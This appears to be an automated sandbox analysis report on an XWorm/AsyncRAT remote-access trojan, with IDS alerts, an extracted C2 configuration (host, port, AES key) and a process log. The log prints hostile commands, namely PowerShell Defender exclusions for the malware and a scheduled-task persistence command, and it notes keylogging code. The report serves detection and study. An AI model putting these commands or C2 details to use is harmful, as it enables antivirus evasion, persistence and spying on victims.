Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ParentProcessId: 7352, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp", ProcessId: 7908, ProcessName: schtasks.exe

Snort Signatures

ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 - Source IP: 193.161.193.99 - Destination IP: 192.168.2.10

Timestamp:	07/18/24-08:39:03.973866
SID:	2852874
Source Port:	30608
Destination Port:	49708
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 193.161.193.99 - Destination IP: 192.168.2.10

Timestamp:	07/18/24-08:39:13.060374
SID:	2852870
Source Port:	30608
Destination Port:	49708
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.10 - Destination IP: 193.161.193.99

Timestamp:	07/18/24-08:35:28.425606
SID:	2855924
Source Port:	49708
Destination Port:	30608
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) - Source IP: 192.168.2.10 - Destination IP: 193.161.193.99

Timestamp:	07/18/24-08:39:13.061283
SID:	2852923
Source Port:	49708
Destination Port:	30608
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.10 - Destination IP: 193.161.193.99

Timestamp:	07/18/24-08:36:45.798419
SID:	2853193
Source Port:	49708
Destination Port:	30608
Protocol:	TCP
Classtype:	A Network Trojan was detected

Suricata Signatures

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.10 - Destination IP: 193.161.193.99

Timestamp:	2024-07-18T08:35:28.425606+0200
SID:	2855924
Source Port:	49708
Destination Port:	30608
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes - Source IP: 193.161.193.99 - Destination IP: 192.168.2.10

Timestamp:	2024-07-18T08:39:13.060374+0200
SID:	2852870
Source Port:	30608
Destination Port:	49708
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) - Source IP: 192.168.2.10 - Destination IP: 193.161.193.99

Timestamp:	2024-07-18T08:39:13.061283+0200
SID:	2852923
Source Port:	49708
Destination Port:	30608
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 - Source IP: 193.161.193.99 - Destination IP: 192.168.2.10

Timestamp:	2024-07-18T08:39:03.973866+0200
SID:	2852874
Source Port:	30608
Destination Port:	49708
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound - Source IP: 192.168.2.10 - Destination IP: 193.161.193.99

Timestamp:	2024-07-18T08:36:45.798419+0200
SID:	2853193
Source Port:	49708
Destination Port:	30608
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: moneymaker-30608.portmap.host

Avira URL Cloud: Label: phishing

Found malware configuration

Source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["moneymaker-30608.portmap.host"], "Port": "30608", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\XClient.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Virustotal: Detection: 36%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\XClient.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack	String decryptor: moneymaker-30608.portmap.host
Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack	String decryptor: 30608
Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack	String decryptor: <123456789>
Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack	String decryptor: <Xwormmm>
Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack	String decryptor: XWorm V5.2
Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack	String decryptor: USB.exe
Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack	String decryptor: %AppData%
Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack	String decryptor: XClient.exe
Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack	String decryptor: bc1qz32y9es3p6hv6xs4kpqn4sqmrrr888qfyp67hm
Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack	String decryptor: 0xCe6C8E673e5d9aE4Ee7F357fE94b7EC06B52f3Fd
Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack	String decryptor: TSoemRqDkQLR8bnFkw6tsBTUAaAyCujx5y

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49708 -> 193.161.193.99:30608
Source: Traffic	Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 193.161.193.99:30608 -> 192.168.2.10:49708
Source: Traffic	Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.10:49708 -> 193.161.193.99:30608
Source: Traffic	Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 193.161.193.99:30608 -> 192.168.2.10:49708
Source: Traffic	Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.10:49708 -> 193.161.193.99:30608

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: moneymaker-30608.portmap.host

Source: global traffic

TCP traffic: 192.168.2.10:49708 -> 193.161.193.99:30608

Source: Joe Sandbox View

IP Address: 193.161.193.99 193.161.193.99

Source: Joe Sandbox View

ASN Name: BITREE-ASRU BITREE-ASRU

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: moneymaker-30608.portmap.host

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1308339600.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 0000000E.00000002.3724466160.0000000002731000.00000004.00000800.00020000.00000000.sdmp, pNYyTm.exe, 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 19.2.pNYyTm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 15.2.pNYyTm.exe.34379b0.3.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 15.2.pNYyTm.exe.342d6d4.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 15.2.pNYyTm.exe.34379b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Code function: 1_2_0144DE6C	1_2_0144DE6C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Code function: 1_2_059697E0	1_2_059697E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Code function: 14_2_00A94530	14_2_00A94530
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Code function: 14_2_00A91358	14_2_00A91358
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Code function: 14_2_00A93F38	14_2_00A93F38
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Code function: 14_2_00A91A0A	14_2_00A91A0A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Code function: 14_2_06452F70	14_2_06452F70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Code function: 14_2_06457C38	14_2_06457C38
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Code function: 14_2_06459CD8	14_2_06459CD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Code function: 14_2_06453840	14_2_06453840
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Code function: 14_2_06455788	14_2_06455788
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Code function: 14_2_06452C28	14_2_06452C28
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_019CDE6C	15_2_019CDE6C
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_06447CD8	15_2_06447CD8
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_064434E8	15_2_064434E8
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_06441559	15_2_06441559
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_06441568	15_2_06441568
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_064430B0	15_2_064430B0
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_06441130	15_2_06441130
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_06440CF8	15_2_06440CF8
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 15_2_064597E0	15_2_064597E0
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Code function: 19_2_012D1358	19_2_012D1358

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1306863840.000000000114E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1314250556.00000000055F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCAA.dll4 vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1308339600.0000000002E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCAA.dll4 vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000000.1265344738.0000000000C26000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQudI.exe" vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamexraw.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1315917095.0000000006020000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1308667338.000000000405E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 0000000E.00000002.3727198558.0000000003731000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQudI.exe" vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 0000000E.00000002.3728206247.0000000005639000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Binary or memory string: OriginalFilenameQudI.exe" vs SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 19.2.pNYyTm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 15.2.pNYyTm.exe.34379b0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 15.2.pNYyTm.exe.342d6d4.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 15.2.pNYyTm.exe.34379b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: pNYyTm.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, lNjw1JhxSV5n0cCMNW.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, lNjw1JhxSV5n0cCMNW.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, lNjw1JhxSV5n0cCMNW.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, fw1IB4uqclhjXGAZvN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, fw1IB4uqclhjXGAZvN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, QHOw32oMEn7lDsZbTi.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, QHOw32oMEn7lDsZbTi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, QHOw32oMEn7lDsZbTi.cs	Security API names: _0020.AddAccessRule
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, QHOw32oMEn7lDsZbTi.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, QHOw32oMEn7lDsZbTi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.6020000.9.raw.unpack, QHOw32oMEn7lDsZbTi.cs	Security API names: _0020.AddAccessRule
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, QHOw32oMEn7lDsZbTi.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, QHOw32oMEn7lDsZbTi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40b1230.6.raw.unpack, QHOw32oMEn7lDsZbTi.cs	Security API names: _0020.AddAccessRule
Source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.40fcc50.5.raw.unpack, fw1IB4uqclhjXGAZvN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@20/18@1/1

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

File created: C:\Users\user\AppData\Roaming\pNYyTm.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Mutant created: \Sessions\1\BaseNamedObjects\Gt5MojO5rBrt6ybL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7132:120:WilError_03

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

File created: C:\Users\user\AppData\Local\Temp\tmp496E.tmp

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Virustotal: Detection: 36%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\pNYyTm.exe C:\Users\user\AppData\Roaming\pNYyTm.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\pNYyTm.exe	Process created: C:\Users\user\AppData\Roaming\pNYyTm.exe "C:\Users\user\AppData\Roaming\pNYyTm.exe"
